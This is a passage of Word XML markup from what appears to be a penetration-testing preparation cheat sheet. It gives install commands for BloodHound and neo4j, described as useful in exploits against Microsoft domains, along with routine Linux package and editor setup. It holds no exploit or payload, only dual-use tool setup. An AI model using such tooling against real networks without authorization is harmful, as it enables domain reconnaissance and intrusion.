      <w:tr w:rsidR="0049266F" w14:paraId="7241A292" w14:textId="77777777" w:rsidTr="0049266F">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="611" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="F7CAAC" w:themeFill="accent2" w:themeFillTint="66"/>
          </w:tcPr>
          <w:p w14:paraId="68504EBF" w14:textId="77777777" w:rsidR="00834B5C" w:rsidRDefault="00834B5C" w:rsidP="00834B5C">
            <w:r>
              <w:t>01.j</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2388" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FBE4D5" w:themeFill="accent2" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="6BE9DC30" w14:textId="77777777" w:rsidR="00834B5C" w:rsidRDefault="00834B5C" w:rsidP="00834B5C">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>bloodhound</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r w:rsidRPr="00F93CE3">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>(There is more about bloodhound later on)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8028" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="24" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="05B0FF5F" w14:textId="77777777" w:rsidR="00834B5C" w:rsidRDefault="00834B5C" w:rsidP="00834B5C">
            <w:r>
              <w:t>Use pip to install/update, use:</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="0003467C">
              <w:rPr>
                <w:color w:val="FF0000"/>
                <w:u w:val="single"/>
              </w:rPr>
              <w:t>sudo</w:t>
            </w:r>
            <w:r w:rsidRPr="0003467C">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t xml:space="preserve"> pip </w:t>
            </w:r>
            <w:r w:rsidRPr="0003467C">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t xml:space="preserve">install </w:t>
            </w:r>
            <w:r w:rsidRPr="0003467C">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t xml:space="preserve">bloodhound </w:t>
            </w:r>
            <w:r w:rsidRPr="0003467C">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t>-U</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00834B5C" w14:paraId="1F5CEAC9" w14:textId="77777777" w:rsidTr="0049266F">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="611" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="F7CAAC" w:themeFill="accent2" w:themeFillTint="66"/>
          </w:tcPr>
          <w:p w14:paraId="5B06AAAE" w14:textId="77777777" w:rsidR="00834B5C" w:rsidRDefault="00834B5C" w:rsidP="00834B5C">
            <w:r>
              <w:t>01.k</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2388" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FBE4D5" w:themeFill="accent2" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="29CEC7EE" w14:textId="77777777" w:rsidR="00834B5C" w:rsidRDefault="00834B5C" w:rsidP="00834B5C">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>Useful Commands</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8028" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="24" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="7CD8AC74" w14:textId="77777777" w:rsidR="00834B5C" w:rsidRDefault="00834B5C" w:rsidP="00834B5C">
            <w:r>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00442AAA">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t>./</w:t>
            </w:r>
            <w:r w:rsidRPr="00442AAA">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>FILENAME.</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>TYPE</w:t>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r>
              <w:tab/>
              <w:t>Will execute if permissions allow</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00442AAA">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t>chmod</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00442AAA">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t>+x</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00442AAA">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>FILE.</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>TYPE</w:t>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r>
              <w:tab/>
              <w:t xml:space="preserve">Will give the execute permission to the </w:t>
            </w:r>
            <w:r w:rsidRPr="00442AAA">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>FILE</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="009C4E27">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t xml:space="preserve">bash </w:t>
            </w:r>
            <w:r w:rsidRPr="009C4E27">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t xml:space="preserve">-x </w:t>
            </w:r>
            <w:r w:rsidRPr="009C4E27">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>./FILE.</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>TYPE</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:tab/>
              <w:t xml:space="preserve">Will debug the </w:t>
            </w:r>
            <w:r w:rsidRPr="001A7FA0">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>FILE</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0049266F" w14:paraId="1F333400" w14:textId="77777777" w:rsidTr="0049266F">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="611" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="F7CAAC" w:themeFill="accent2" w:themeFillTint="66"/>
          </w:tcPr>
          <w:p w14:paraId="4AA7D23F" w14:textId="77777777" w:rsidR="00834B5C" w:rsidRDefault="00834B5C" w:rsidP="00834B5C"/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2388" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FBE4D5" w:themeFill="accent2" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="2339A1B1" w14:textId="77777777" w:rsidR="00834B5C" w:rsidRDefault="00834B5C" w:rsidP="00834B5C">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8028" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="24" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="74FCBEDE" w14:textId="77777777" w:rsidR="00834B5C" w:rsidRDefault="00834B5C" w:rsidP="00834B5C"/>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="572FB3B8" w14:textId="020F7124" w:rsidR="00F93CE3" w:rsidRDefault="00834B5C" w:rsidP="00834B5C">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>Planning and Preparation (1)</w:t>
      </w:r>
      <w:r w:rsidR="00F93CE3">
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="107B9CBD" w14:textId="182184D7" w:rsidR="00F93CE3" w:rsidRDefault="00F93CE3" w:rsidP="00F93CE3">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Planning and </w:t>
      </w:r>
      <w:r w:rsidR="001A7FA0">
        <w:t>Preparation</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (2)</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblpPr w:leftFromText="180" w:rightFromText="180" w:vertAnchor="page" w:horzAnchor="margin" w:tblpY="1098"/>
        <w:tblW w:w="11027" w:type="dxa"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="726"/>
        <w:gridCol w:w="2362"/>
        <w:gridCol w:w="7939"/>
      </w:tblGrid>
      <w:tr w:rsidR="00747624" w14:paraId="087001DD" w14:textId="77777777" w:rsidTr="0049266F">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="615" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="F7CAAC" w:themeFill="accent2" w:themeFillTint="66"/>
          </w:tcPr>
          <w:p w14:paraId="7138ADA3" w14:textId="1470D071" w:rsidR="00747624" w:rsidRDefault="00500E0F" w:rsidP="00F93CE3">
            <w:r>
              <w:t>0</w:t>
            </w:r>
            <w:r w:rsidR="00747624">
              <w:t>1.aa</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2390" w:type="dxa"/>
            <w:vMerge w:val="restart"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FBE4D5" w:themeFill="accent2" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="266A4226" w14:textId="7F333BE5" w:rsidR="00747624" w:rsidRDefault="00747624" w:rsidP="00F93CE3">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>neo4j</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8022" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="24" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="55787010" w14:textId="3B364779" w:rsidR="00747624" w:rsidRDefault="00747624" w:rsidP="00F93CE3">
            <w:r>
              <w:t>To install, use:</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00747624">
              <w:rPr>
                <w:color w:val="FF0000"/>
                <w:u w:val="single"/>
              </w:rPr>
              <w:t>sudo</w:t>
            </w:r>
            <w:r w:rsidRPr="00747624">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t xml:space="preserve"> apt </w:t>
            </w:r>
            <w:r w:rsidRPr="00747624">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t xml:space="preserve">install </w:t>
            </w:r>
            <w:r w:rsidRPr="00747624">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>neo4j</w:t>
            </w:r>
            <w:r>
              <w:br/>
              <w:t xml:space="preserve">This is a </w:t>
            </w:r>
            <w:r w:rsidRPr="00747624">
              <w:t>graph database management system</w:t>
            </w:r>
            <w:r>
              <w:t>, useful in exploits with MS Domains.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00747624" w14:paraId="482F95B4" w14:textId="77777777" w:rsidTr="0049266F">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="615" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="F7CAAC" w:themeFill="accent2" w:themeFillTint="66"/>
          </w:tcPr>
          <w:p w14:paraId="4C042BEA" w14:textId="46F93B38" w:rsidR="00747624" w:rsidRDefault="00500E0F" w:rsidP="00F93CE3">
            <w:r>
              <w:t>0</w:t>
            </w:r>
            <w:r w:rsidR="00747624">
              <w:t>1.bb</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2390" w:type="dxa"/>
            <w:vMerge/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FBE4D5" w:themeFill="accent2" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="5715856D" w14:textId="77777777" w:rsidR="00747624" w:rsidRDefault="00747624" w:rsidP="00F93CE3">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8022" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="24" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="6FAC8322" w14:textId="492168C6" w:rsidR="00747624" w:rsidRDefault="00747624" w:rsidP="00F93CE3">
            <w:r>
              <w:t>Now, start the service with:</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00747624">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t>neo4j start console</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F93CE3" w14:paraId="1263477C" w14:textId="77777777" w:rsidTr="0049266F">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="615" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="F7CAAC" w:themeFill="accent2" w:themeFillTint="66"/>
          </w:tcPr>
          <w:p w14:paraId="648EF906" w14:textId="6261A7B6" w:rsidR="00F93CE3" w:rsidRDefault="00500E0F" w:rsidP="00F93CE3">
            <w:r>
              <w:t>0</w:t>
            </w:r>
            <w:r w:rsidR="005933F6">
              <w:t>1.cc</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2390" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FBE4D5" w:themeFill="accent2" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="5BF444D4" w14:textId="2647BE69" w:rsidR="00F93CE3" w:rsidRDefault="005933F6" w:rsidP="00F93CE3">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>locate</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8022" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="24" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="32269F06" w14:textId="77777777" w:rsidR="00F93CE3" w:rsidRDefault="005933F6" w:rsidP="00F93CE3">
            <w:r>
              <w:t>To update the database for the locate command, type:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5F7B25BA" w14:textId="5999595A" w:rsidR="005933F6" w:rsidRDefault="005933F6" w:rsidP="00F93CE3">
            <w:r>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="005933F6">
              <w:rPr>
                <w:color w:val="FF0000"/>
                <w:u w:val="single"/>
              </w:rPr>
              <w:t>sudo</w:t>
            </w:r>
            <w:r w:rsidRPr="00690494">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t xml:space="preserve"> updatedb</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F93CE3" w14:paraId="6DAABBE9" w14:textId="77777777" w:rsidTr="0049266F">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="615" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="F7CAAC" w:themeFill="accent2" w:themeFillTint="66"/>
          </w:tcPr>
          <w:p w14:paraId="05BA1DA4" w14:textId="576BDF30" w:rsidR="00F93CE3" w:rsidRDefault="00500E0F" w:rsidP="00F93CE3">
            <w:r>
              <w:t>0</w:t>
            </w:r>
            <w:r w:rsidR="0066284A">
              <w:t>1.dd</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2390" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FBE4D5" w:themeFill="accent2" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="500FDBE4" w14:textId="05FD2F14" w:rsidR="00F93CE3" w:rsidRDefault="0066284A" w:rsidP="00F93CE3">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>update apt-get</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8022" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="24" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="6F44B6D0" w14:textId="77777777" w:rsidR="00F93CE3" w:rsidRDefault="0066284A" w:rsidP="00F93CE3">
            <w:r>
              <w:t xml:space="preserve">To ensure </w:t>
            </w:r>
            <w:r w:rsidRPr="001A7FA0">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t xml:space="preserve">apt-get </w:t>
            </w:r>
            <w:r>
              <w:t>is going to work with http sources, use:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="442C28A5" w14:textId="77777777" w:rsidR="0066284A" w:rsidRDefault="0066284A" w:rsidP="00F93CE3">
            <w:pPr>
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="0066284A">
              <w:rPr>
                <w:color w:val="FF0000"/>
                <w:u w:val="single"/>
              </w:rPr>
              <w:t>sudo</w:t>
            </w:r>
            <w:r w:rsidRPr="0066284A">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t xml:space="preserve"> apt-get</w:t>
            </w:r>
            <w:r w:rsidRPr="0066284A">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="0066284A">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t xml:space="preserve">install </w:t>
            </w:r>
            <w:r w:rsidRPr="0066284A">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>apt-transport-https</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6EC09897" w14:textId="4DF10339" w:rsidR="0066284A" w:rsidRDefault="0066284A" w:rsidP="00F93CE3">
            <w:r>
              <w:t>To ensure apt</w:t>
            </w:r>
            <w:r w:rsidR="008B5DEC">
              <w:t xml:space="preserve"> and all packages are</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> up to date, use:</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="0066284A">
              <w:rPr>
                <w:color w:val="FF0000"/>
                <w:u w:val="single"/>
              </w:rPr>
              <w:t>sudo</w:t>
            </w:r>
            <w:r w:rsidRPr="0066284A">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t xml:space="preserve"> apt-get </w:t>
            </w:r>
            <w:r w:rsidRPr="0066284A">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t>update</w:t>
            </w:r>
            <w:r w:rsidR="008B5DEC">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:r w:rsidR="008B5DEC">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="008B5DEC" w:rsidRPr="008B5DEC">
              <w:rPr>
                <w:color w:val="FF0000"/>
                <w:u w:val="single"/>
              </w:rPr>
              <w:t>sudo</w:t>
            </w:r>
            <w:r w:rsidR="008B5DEC" w:rsidRPr="008B5DEC">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t xml:space="preserve"> apt-get </w:t>
            </w:r>
            <w:r w:rsidR="008B5DEC" w:rsidRPr="008B5DEC">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t>upgrade</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F93CE3" w14:paraId="59FC54B3" w14:textId="77777777" w:rsidTr="0049266F">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="615" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="F7CAAC" w:themeFill="accent2" w:themeFillTint="66"/>
          </w:tcPr>
          <w:p w14:paraId="49F7B894" w14:textId="605E07C2" w:rsidR="00F93CE3" w:rsidRDefault="00500E0F" w:rsidP="00F93CE3">
            <w:r>
              <w:t>0</w:t>
            </w:r>
            <w:r w:rsidR="0066284A">
              <w:t>1.ee</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2390" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FBE4D5" w:themeFill="accent2" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="3F70E500" w14:textId="5D9BEE2A" w:rsidR="00F93CE3" w:rsidRDefault="0066284A" w:rsidP="00F93CE3">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>sublime</w:t>
            </w:r>
            <w:r w:rsidR="001A7FA0">
              <w:br/>
            </w:r>
            <w:r w:rsidR="001A7FA0" w:rsidRPr="001A7FA0">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>(A simple text editor to keep notes or open and edit text files, like nano)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8022" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="24" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="139A0C8C" w14:textId="19FE12A2" w:rsidR="0066284A" w:rsidRPr="0066284A" w:rsidRDefault="0066284A" w:rsidP="0066284A">
            <w:pPr>
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:t>Use these commands, one at a time to install sublime:</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="0066284A">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t>wget</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="0066284A">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t xml:space="preserve">-qO </w:t>
            </w:r>
            <w:r w:rsidRPr="0066284A">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t xml:space="preserve">- https://download.sublimetext.com/sublimehq-pub.gpg </w:t>
            </w:r>
            <w:r w:rsidRPr="0066284A">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t>|</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="0066284A">
              <w:rPr>
                <w:color w:val="FF0000"/>
                <w:u w:val="single"/>
              </w:rPr>
              <w:t>sudo</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="0066284A">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t>apt-</w:t>
            </w:r>
            <w:r w:rsidRPr="0066284A">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:tab/>
              <w:t>key</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="0066284A">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>add -</w:t>
            </w:r>
            <w:r w:rsidR="00AC3372">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00AC3372">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00AC3372">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00AC3372">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00AC3372">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:tab/>
            </w:r>
